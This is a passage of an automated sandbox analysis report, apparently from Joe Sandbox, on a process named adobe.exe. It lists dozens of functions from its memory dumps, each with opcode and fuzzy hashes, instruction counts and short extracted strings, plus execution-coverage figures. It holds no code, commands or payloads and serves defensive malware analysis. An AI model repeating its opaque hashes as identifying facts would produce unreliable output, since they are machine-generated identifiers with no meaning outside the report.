Instruction Fuzzy Hash: 29E0D87300D3949FD302AF1C99A53C77F929F52200F548857D9C446156D38C846AD257

Function 05FABC19 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cd91ff4f1fc5bfe63f3eda922473ff664aff761deeb809da7ef3fc621712948
Instruction ID: 56843b15232477f7d75088840b03688e7f41860de2eedf483bec7e7326d62945
Opcode Fuzzy Hash: 2cd91ff4f1fc5bfe63f3eda922473ff664aff761deeb809da7ef3fc621712948
Instruction Fuzzy Hash: EBE0C27294C3C9DEC7028BA495115997FB1EF4720475800CFD4848F022E9370D1B9796

Function 05FA908C Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 259a07925df986d070966bdf98d48a5d477a1e0725c1d6bb49048e4bb26faf04
Instruction ID: aaeaede4e7b450adb4c6c9908fd15dd29ca96e1715cb60f6c41db6cb72c4d571
Opcode Fuzzy Hash: 259a07925df986d070966bdf98d48a5d477a1e0725c1d6bb49048e4bb26faf04
Instruction Fuzzy Hash: 0CE0EC7684E349CFCB00CBA0C0489ACBBBEAF0B350B019481D45A9B253C7BC9844CA15

Function 05FABAEF Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b390284f2e47ec62665e73c58207963917755839b6b0144a1aa0ce46999b3c89
Instruction ID: 68fe87902293d24a8aed86d6c77d5b84b8098828a2f9d2c53020b75563fd1c29
Opcode Fuzzy Hash: b390284f2e47ec62665e73c58207963917755839b6b0144a1aa0ce46999b3c89
Instruction Fuzzy Hash: 21D05E3560C3815FD246DE0488508A6BBB2EBD6204B14C88BEC908B762CB2ADD0BC761

Function 05FAF6C8 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68d4a67132bce6f9929471afa6e6e98aaefb1e110e440e5bdcd960a177bc8631
Instruction ID: 5d326322acbffc809871b0b8e3dd87d61518e02235dfcfb6d108905483866bbd
Opcode Fuzzy Hash: 68d4a67132bce6f9929471afa6e6e98aaefb1e110e440e5bdcd960a177bc8631
Instruction Fuzzy Hash: CBE01775D1520CEFCB80EFB8E44A69CBFF4AB04201F1080AAE809A3350EA745A80CF41

Function 05FA90AA Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f64d22e3a3abd6cce0daabefc88d85a7c05dec8770ebf356ebfea0e1b5e95c4d
Instruction ID: 047e0bf670754e0f11a65e250fdf2b3b00e8f9d7e7768edbffe34a4605cdb7f8
Opcode Fuzzy Hash: f64d22e3a3abd6cce0daabefc88d85a7c05dec8770ebf356ebfea0e1b5e95c4d
Instruction Fuzzy Hash: 70D067BBD4E209CBCB04CBA1C5449A8F77EBB4A351B11A555985A6B202C6F89444CA42

Function 05FACCF0 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1a166cebf2bdc6aed26607cdd42120a7285399b8532ab0255c41107e1aff8da
Instruction ID: 5bb09626985497d8724c37880b77a4b0956abdf992bd29b8736fceed19e08bea
Opcode Fuzzy Hash: d1a166cebf2bdc6aed26607cdd42120a7285399b8532ab0255c41107e1aff8da
Instruction Fuzzy Hash: 78E0E2B59082688FCB50DF58D8907AEBBFABB19310F109185E05DE7306D730AD80CF42

Function 05FA2E51 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad8ea3673dba17ca1a5e3f4050878d84fdf0aa9d9cd3d84d1acc5a7bedbddbf9
Instruction ID: e7eb971e41845cc0d121306f5ee03ce87893dfe6da3d7ebf22084e232ba04149
Opcode Fuzzy Hash: ad8ea3673dba17ca1a5e3f4050878d84fdf0aa9d9cd3d84d1acc5a7bedbddbf9
Instruction Fuzzy Hash: F8E0127790414CDBC740CBB4DF4529A7FF1EF45220F2446EAD416D7251EA368A019742

Function 05FABC28 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6384d6a4b8d619fc11de0df5b441dbfa5f89ecd9dce3d65da81b5091c5bb2cab
Instruction ID: 84ba5217fc4c82d7b9921d243605bd4c1ff270362b10efe048447fcde474eb9f
Opcode Fuzzy Hash: 6384d6a4b8d619fc11de0df5b441dbfa5f89ecd9dce3d65da81b5091c5bb2cab
Instruction Fuzzy Hash: 0ED0C772D4910CFF8B00DFA4890199EB7FDDB4514079045E69505D7110ED365A1557E2

Function 05FA2E60 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eca9801a4b1f6fe408e6182e3edc2cb07cc9ac14754f8007709dabd3694a199f
Instruction ID: 483db9e32e7538e1019118b9f238e4130d6ed6bb49c5ec4b97c312a5fc9af526
Opcode Fuzzy Hash: eca9801a4b1f6fe408e6182e3edc2cb07cc9ac14754f8007709dabd3694a199f
Instruction Fuzzy Hash: 9FD0A77690010CEFC700DFA0C94049D7FFEEB08210B1044E6E806D3210ED354A005792

Function 05FA43F8 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44423e6c21d75701eca0e3e47a12c1a85bd3575b230757a77aa8a1d735cace5e
Instruction ID: de935079136753fc3ff141e8f705a822afe0bb66122f6e2217bb7aeef0bec757
Opcode Fuzzy Hash: 44423e6c21d75701eca0e3e47a12c1a85bd3575b230757a77aa8a1d735cace5e
Instruction Fuzzy Hash: 2FD0A7762042106FD240C918CC00F53B395EBC8720F18C90EF4A0833E0DB63DC02CB90

Function 05FA4FE0 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7356d37f2d525d9f9582e608741b787829384326b1a483a9177c879fb0069732
Instruction ID: a8779afe162c4b3bac42b871e8f077d08a907fbb40ff538b0c8145da9d0ea236
Opcode Fuzzy Hash: 7356d37f2d525d9f9582e608741b787829384326b1a483a9177c879fb0069732
Instruction Fuzzy Hash: 3DC08CB3B000002BC30CCAD8CC51752A392CBE8300F28CC6BA808DB340EA2BDD038288

Function 05FA4110 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cee6f881f926603d293383916bf87a83a0dffb2148474bc917becfdf6f54a92
Instruction ID: 861784d121f0616d127c245e5382f9022140148b71ac035f7b53dec6b26397d4
Opcode Fuzzy Hash: 2cee6f881f926603d293383916bf87a83a0dffb2148474bc917becfdf6f54a92
Instruction Fuzzy Hash: 9FD0A7324042044AC341EB28C894789FBB4BF81308F04C65FDCC45B215EF75D44ADB81

Function 05FABF00 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9742d7865735c7252f6c48a7c294f1d1b4f483eb85901c8c33943e63f37f990d
Instruction ID: 48e8204161933d4df9c7b41a33249025f43fd015cf28c75e97648b457401bf24
Opcode Fuzzy Hash: 9742d7865735c7252f6c48a7c294f1d1b4f483eb85901c8c33943e63f37f990d
Instruction Fuzzy Hash: 84D012752081119F9204CF44E940C6BF7E6EFC8B10B14C84EB84053310CA72DC17CBB2

Function 05FABEF0 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83ac87b33f4e7c2ed6fd866f96dfa45f7872808ebc2cc145dd578ae07973c42f
Instruction ID: a1cbd0c1e1eb3776157d73c83f72428de7c9d4044dd0bed02cedb038e46015fc
Opcode Fuzzy Hash: 83ac87b33f4e7c2ed6fd866f96dfa45f7872808ebc2cc145dd578ae07973c42f
Instruction Fuzzy Hash: 49D05E7520C2828FC305CF44E550815BBA1EF96200B15888EEC5197246C722DC12CB36

Function 05FA4CF0 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18caacad267c050a140cf0e584327bf300c5516fc678aea809c7f7fdad8831aa
Instruction ID: cd68c4c5a79c252e4cf7653fc3283620a8d2e3e804c8e4aad773b991d5e13512
Opcode Fuzzy Hash: 18caacad267c050a140cf0e584327bf300c5516fc678aea809c7f7fdad8831aa
Instruction Fuzzy Hash: 19C0122430094807E709C328CC41304A7A29BC9215F68C2BCA868C73E6EB2ACC038600

Function 05FAECA0 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 066892ed072b5ade307b0d300ebb94d5f6eac7ef3de3ad69f041c18133a27895
Instruction ID: b2a425aedafffadb5d1955cabdf59c613925d127352e620d4484f04c7ae5b01c
Opcode Fuzzy Hash: 066892ed072b5ade307b0d300ebb94d5f6eac7ef3de3ad69f041c18133a27895
Instruction Fuzzy Hash: 70C02B3201170C87E20137F4F40E7647F6C6705306F404020F20D414528FBC5080CF62

Function 05FACFFF Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 941def5b792158e9b0974a78a2ab86eef914b8180bcb2b83110e6320fd51a73d
Instruction ID: 19eba5c10770b19882abc25e0b6d630f91564694bed7d4943710962308afc859
Opcode Fuzzy Hash: 941def5b792158e9b0974a78a2ab86eef914b8180bcb2b83110e6320fd51a73d
Instruction Fuzzy Hash: A1C0EA641096C05FD7428624C9A5744AF71AB8720DF69C0DEA4889FA97DA6BD80B8702

Function 05FA46A8 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3280e6e329ef31447f1898656c2e33f90a97c83c0441c5bd5be684c062d4b347
Instruction ID: ad9f64657505e76eb31e5dafeb601260d8735d35c93f3fb22e8af20b12ad2807
Opcode Fuzzy Hash: 3280e6e329ef31447f1898656c2e33f90a97c83c0441c5bd5be684c062d4b347
Instruction Fuzzy Hash: 0DC04C7B1560049B8A41B764C98CC15FAA6FF997047858892A28546034D629D518DB16

Function 05FA8A5F Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58cb33d46a03b9f49070130d129416bda64a13dc20def6f9731980ae63d9d829
Instruction ID: 4d57411e723f5dd1be5bec6aeb1138ac1fc761e98288c13e3c93c5a3c5e54281
Opcode Fuzzy Hash: 58cb33d46a03b9f49070130d129416bda64a13dc20def6f9731980ae63d9d829
Instruction Fuzzy Hash: D8C002B3D1C248CFC725CF60D4654AC7F7AAB0E691B20555A906797253CA681841CF17

Function 05FAA798 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd44a762dbc894d264ad16d9ebceccec7f339f0f4123fef2a1dde8799dbb7abf
Instruction ID: 8dd6d2aae9a9bec318c93b5df869804a22a50b84431d2ea7eeab89ab4a0c0d41
Opcode Fuzzy Hash: fd44a762dbc894d264ad16d9ebceccec7f339f0f4123fef2a1dde8799dbb7abf
Instruction Fuzzy Hash: 5CB012BB2D524AA1840077648D8CD2FE615EFA2F00FD08C16B3C540058C52D84B9D71F

Function 05FAD102 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 787fb87cf780cad9599bd9803dd1b8e4691737f104342aad049e877fb0d6420b
Instruction ID: ba96e24316a7b63bd25850609c9f122522cd52cee16698c4e14f8d1f9d536d38
Opcode Fuzzy Hash: 787fb87cf780cad9599bd9803dd1b8e4691737f104342aad049e877fb0d6420b
Instruction Fuzzy Hash: C0C048A100E3C18EEB0396B4A8250426FB06D4311030A02DBF4A0C94A7CB096A29E726

Function 05FA89EE Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f92e84ed5da43edc569fc6802297287fa2ecec8b11058c7437aca36e8bd495d2
Instruction ID: ae0b5bdaa353a95324f737ef42d31f4f8fef8043bd51bafb5eb9fc041e7e655f
Opcode Fuzzy Hash: f92e84ed5da43edc569fc6802297287fa2ecec8b11058c7437aca36e8bd495d2
Instruction Fuzzy Hash: AEC048B2D08208CBCB24CFA0D0644ACBBBAEB0D291B20551EA027A3202CB681842CF12

Function 05FA8140 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44

Analysis Process: adobe.exePID: 7500, Parent PID: 7428COMMON

Execution Graph

Execution Coverage:	10.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	198
Total number of Limit Nodes:	23

Executed Functions

Function 06963418 Relevance: 8.0, Strings: 6, Instructions: 545
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$kq, xrefs: 06963B4C
$kq, xrefs: 06963B17
$kq, xrefs: 06963B64
$kq, xrefs: 06963B40
$kq, xrefs: 06963B70
$kq, xrefs: 06963B23

Memory Dump Source

Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6960000_adobe.jbxd

Similarity

API ID:
String ID: $kq$$kq$$kq$$kq$$kq$$kq
API String ID: 0-1342094364
Opcode ID: 1925c3cd0b38caa2896fec43d2341c7b995b47dec3e864a561a618e93ac23e48
Instruction ID: 55d1b08021736d2d6409e6f55ed26c508f62760a93e47b192bab1b640d4a68e8
Opcode Fuzzy Hash: 1925c3cd0b38caa2896fec43d2341c7b995b47dec3e864a561a618e93ac23e48
Instruction Fuzzy Hash: 77321D34E1071A8FCB14EF75D9945ADF7B6FF89300F209669E409A7264EB30A985CF90

Function 06967CF8 Relevance: 3.0, Strings: 2, Instructions: 475
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$kq, xrefs: 06968035
$kq, xrefs: 06968041

Memory Dump Source

Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6960000_adobe.jbxd

Similarity

API ID:
String ID: $kq$$kq
API String ID: 0-3550614674
Opcode ID: 1549a3aa10a29a47d1600ff070d7f1a4be764cca00ed31d5c3af745c8e279e76
Instruction ID: 6bc61680ed1204066f7a9b8964f91059aff81bb0c0ae9651ae27ae4d0b402b81
Opcode Fuzzy Hash: 1549a3aa10a29a47d1600ff070d7f1a4be764cca00ed31d5c3af745c8e279e76
Instruction Fuzzy Hash: BE02A030B006058FDB54DBA5D650AAEB7F6FF84304F248929E405DB799DB35EC86CB90

Function 06962742 Relevance: 1.0, Instructions: 1008COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6960000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31a6ec345c2a093efa144be2fc2282f35e95f20db1573a5ca1db5c01e4a30bbc
Instruction ID: 30c40d59992299e985d882772624e544c5d79582383a402ccea92ccf42548cd4
Opcode Fuzzy Hash: 31a6ec345c2a093efa144be2fc2282f35e95f20db1573a5ca1db5c01e4a30bbc
Instruction Fuzzy Hash: 6C926834E003048FDB64CF69C584A6DBBF6EF45310F6484A9E84AAB765DB35ED85CB80

Function 06966560 Relevance: .8, Instructions: 815COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6960000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86cc00ba5f4845164cd7fde4690bb18b568127803d151a722c88348891e7f0f8
Instruction ID: 26ffdfe2790e42a36a132785528745cf94984ef8efe65cb70a88bc2663f044c5
Opcode Fuzzy Hash: 86cc00ba5f4845164cd7fde4690bb18b568127803d151a722c88348891e7f0f8
Instruction Fuzzy Hash: B062CD30B002048FDB64DB69D594BADB7F6EF88314F248429E806EB795DB35ED46CB81

Function 0696C0F8 Relevance: .6, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6960000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a87d818058e0f499ea7bbabc7599104c79f271ab40d5aa08634fd0b9ed16bd3b
Instruction ID: eb3797fbb0ab8ebc05eb37bd6c944b7a46650146634ef252b9137615f3f7bb17
Opcode Fuzzy Hash: a87d818058e0f499ea7bbabc7599104c79f271ab40d5aa08634fd0b9ed16bd3b
Instruction Fuzzy Hash: D1328034B10209CFDB54DB69D980BAEB7B6EB88310F208526F445E7759DB35EC46CB90

Function 06965550 Relevance: .6, Instructions: 585COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6960000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f9abe7303a21b5f250bae4fb2efe41120394a21744c0f72928d7e6b0fa3bd54
Instruction ID: 6ba62b9c3a900c9d98683217301bb93a3b7c2e07c066ba0eb5e106b53cd809ed
Opcode Fuzzy Hash: 7f9abe7303a21b5f250bae4fb2efe41120394a21744c0f72928d7e6b0fa3bd54
Instruction Fuzzy Hash: DF12DF71F003058FDF60DB66C98066EBBBAEF85310F21842AE916DB795DA34ED41CB90

Function 0696B198 Relevance: .6, Instructions: 568COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6960000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bad1b0b8f473027a842536550a2fabb3a72949f374439da3a4cca6102c05db77
Instruction ID: feaaf664fd99b1bf1293275a04bc875652ccf4f5ed15033fa1693b57bd8cd6a9
Opcode Fuzzy Hash: bad1b0b8f473027a842536550a2fabb3a72949f374439da3a4cca6102c05db77
Instruction Fuzzy Hash: 79227234E002098FDF64DB5AC5907AEB7BAEB45310F308826F449EB799EA35DC91CB51

Function 0696AC40 Relevance: 10.4, Strings: 8, Instructions: 390
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$kq, xrefs: 0696ADE3
$kq, xrefs: 0696ADEF
$kq, xrefs: 0696AD6D
$kq, xrefs: 0696AD61
$kq, xrefs: 0696ADC0
$kq, xrefs: 0696ADB4
$kq, xrefs: 0696AE18
$kq, xrefs: 0696AE0C

Memory Dump Source

Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6960000_adobe.jbxd

Similarity

API ID:
String ID: $kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq
API String ID: 0-1078448309
Opcode ID: 77b1ca2d44b39076d0c5fc0cb7afb39c5a3a7515454c34cdf6dd7e63485fb4d3
Instruction ID: 09b9d616b9debdbe704a9c5d6a843b65d6a763940a10475c7a3da4d3d0660d0c
Opcode Fuzzy Hash: 77b1ca2d44b39076d0c5fc0cb7afb39c5a3a7515454c34cdf6dd7e63485fb4d3
Instruction Fuzzy Hash: 30E14030E103068FDB65DF6AD5906AEB7B6EF85300F208929E405EB759DB35EC46CB90

Function 0696B5C0 Relevance: 8.0, Strings: 6, Instructions: 471COMMON

Download Yara Rule

Strings

$kq, xrefs: 0696BAEB
$kq, xrefs: 0696BAF7
$kq, xrefs: 0696BB1F
$kq, xrefs: 0696BB2B
$kq, xrefs: 0696BB53
$kq, xrefs: 0696BB5F

Memory Dump Source

Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6960000_adobe.jbxd

Similarity

API ID:
String ID: $kq$$kq$$kq$$kq$$kq$$kq
API String ID: 0-1342094364
Opcode ID: d6be3e44462de85d0d71d1eb39b26bc41932f737efd3eb9103e38a24b583cb62
Instruction ID: be982a52b768d704bac837b8e2730be8fa6ef9338cb3925dd38294726656a50c
Opcode Fuzzy Hash: d6be3e44462de85d0d71d1eb39b26bc41932f737efd3eb9103e38a24b583cb62
Instruction Fuzzy Hash: 43029E30E003098FDB64DF6AD5806ADB7B6FB44314F20892AE455DBB59EB34EC95CB81

Function 069690C8 Relevance: 5.2, Strings: 4, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$kq, xrefs: 0696911B
$kq, xrefs: 0696910F
$kq, xrefs: 06969156
$kq, xrefs: 0696914A

Memory Dump Source

Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6960000_adobe.jbxd

Similarity

API ID:
String ID: $kq$$kq$$kq$$kq
API String ID: 0-2881790790
Opcode ID: 4bde54725e2aa3ca4b3b576213828a00fc1974ca8a1efc8aeedb06fac10c1cb6
Instruction ID: f7e1a09c2ddf274948b398334054fee4ba9d6f173e954db4896a0b0b5ab910db
Opcode Fuzzy Hash: 4bde54725e2aa3ca4b3b576213828a00fc1974ca8a1efc8aeedb06fac10c1cb6
Instruction Fuzzy Hash: DB913134F1020A8FDB64DF65D9507AEB7FAEF84240F208569D409DB798EA34ED468F90

Function 0696CEC8 Relevance: 4.5, Strings: 3, Instructions: 799
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$kq, xrefs: 0696D2D3
$kq, xrefs: 0696D2BF
$kq, xrefs: 0696D2C7

Memory Dump Source

Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6960000_adobe.jbxd

Similarity

API ID:
String ID: $kq$$kq$$kq
API String ID: 0-2086306503
Opcode ID: 99042121470e221e147a6bfa88a78293b464cfda265c2833387080a0cbc21b68
Instruction ID: cfb1b8908543fdaa1168897d3b38abf810dd245ffbd9f74b472ee31e7bad4fe5
Opcode Fuzzy Hash: 99042121470e221e147a6bfa88a78293b464cfda265c2833387080a0cbc21b68
Instruction Fuzzy Hash: 6E627330B002068FCB55EF69D680A5EB7B2FF84304B218A69D415DF769DB75ED4ACB80

Function 06964B18 Relevance: 3.9, Strings: 3, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fpq, xrefs: 06965225
XPpq, xrefs: 06964C45
\Opq, xrefs: 06964CCF

Memory Dump Source

Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6960000_adobe.jbxd

Similarity

API ID:
String ID: fpq$XPpq$\Opq
API String ID: 0-2571271785
Opcode ID: 80c4115bbb9934ed22c2d811437f5a187565861194a7889fb53108d833b93455
Instruction ID: 93b18ac33157988815a7ac85da27a0f007c289905412af25c575907f60d52222
Opcode Fuzzy Hash: 80c4115bbb9934ed22c2d811437f5a187565861194a7889fb53108d833b93455
